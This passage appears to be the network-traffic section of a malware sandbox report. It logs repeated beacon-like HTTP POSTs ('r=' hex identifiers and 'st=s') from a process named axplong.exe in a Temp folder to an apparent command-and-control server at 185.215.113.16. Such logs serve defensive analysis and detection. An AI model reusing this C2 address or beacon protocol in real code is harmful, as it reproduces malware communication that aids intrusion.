Sep 26, 2024 15:42:37.761336088 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:37.995116949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	52352	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:38.113203049 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:38.813474894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:38.869442940 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:39.098179102 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	52353	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:39.207828045 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:39.924778938 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:39.926194906 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:40.160979986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	52354	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:40.269043922 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:40.970058918 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:40.970940113 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:41.278166056 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:41.546993017 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	52355	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:41.804069996 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:42.497658014 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:42.498722076 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:42.722876072 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	52356	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:42.831140041 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:43.535562038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:43.536477089 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:43.766567945 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	52357	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:43.879252911 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:44.609877110 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:44.610804081 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:44.842838049 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	52359	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:44.958792925 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:45.657520056 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:45.658691883 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:45.883124113 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	52360	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:46.003679037 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:46.717406034 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:46.718281984 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:46.948828936 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	52361	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:48.062160969 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:48.782737017 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:48.784013033 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:49.012455940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	52362	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:49.128546953 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:49.829962969 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:49.830853939 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:50.055825949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	52363	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:50.176501989 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:50.910456896 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:50.911456108 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:51.144068956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	52364	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:51.256515980 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:51.982882023 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
